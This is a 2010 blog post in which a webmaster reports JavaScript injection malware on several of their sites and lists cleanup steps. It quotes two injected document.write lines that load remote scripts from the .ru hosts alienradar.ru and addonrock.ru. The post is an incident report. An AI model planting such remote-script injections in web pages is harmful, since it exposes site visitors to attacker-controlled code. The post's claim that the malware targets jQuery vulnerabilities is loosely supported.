Pages

Subscribe:

Sep 22, 2010

Alienradar.ru and addonrock.ru javascript Injection Malware

It was September 21,2010 when Javascript is malfunctioning in one of our website. The effects are not showing the way it was coded. I checked the javascript files as well the JQUERY framework and found something suspicious. There is a line that looks like this

document.write('<script type="text/javascript" src="http://alienradar.ru/LCD.js"></script>');
Then the next day, 3 on our sites are reported by google as malware distributing site. Like the other website, I also found some malicious code in the javascript file as well as the index.php file but now with different js name.
document.write('<script type="text/javascript" src="http://addonrock.ru/firewall.js"></script>');
This is script has a domain name of .ru which means russia including:
alienradar.ru and addonrock.ru

This is some informations that we have regarding this script injecting virus.
- It attacks the vulnerabilities of opensource javascript frameworks and plugins like JQUERY.

These are the steps we have done

- We removed all injected scripts in our websites
- we rebooted our web server
- requested a review from google
- Update your Javascript framework into the latest one.

0 Comments: